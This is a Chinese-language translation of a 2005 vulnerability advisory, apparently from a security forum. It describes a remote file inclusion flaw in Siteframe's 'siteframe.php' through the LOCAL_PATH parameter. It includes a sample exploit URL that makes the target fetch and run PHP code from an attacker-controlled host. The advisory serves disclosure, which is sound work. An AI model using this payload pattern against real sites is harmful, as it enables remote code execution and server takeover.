[翻译]Siteframe的'siteframe.php' 包含文件存在漏洞,用户可以执行
资料翻译: fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker ID: 1014150
CVE 叁考: GENERIC-MAP-NOMATCH
日期: 2005 年6月 9 日
影响: 用户经由网络可以执行任意代码
摘要: 摩洛哥得PRI报告了Siteframe 的一个漏洞。利用此漏洞远程用户在目标系统上可以运行任意指令。‘siteframe.php' 脚本包含的与用户提交的'LOCAL_PATH'参数有关的文件过滤不严。 遥远用户通过提交特殊构造的URL在目标主机上执行任意的PHP代码。PHP 代码包括操作系统指令, 得到服务器权限。
漏洞示范:
http://[target]/siteframe/siteframe.php?LOCAL_PATH=http://[attacker]/PRI[ll
解决: 厂商尚未解决。
厂商网址: [url]www.siteframe.org[/url]
页:
[1]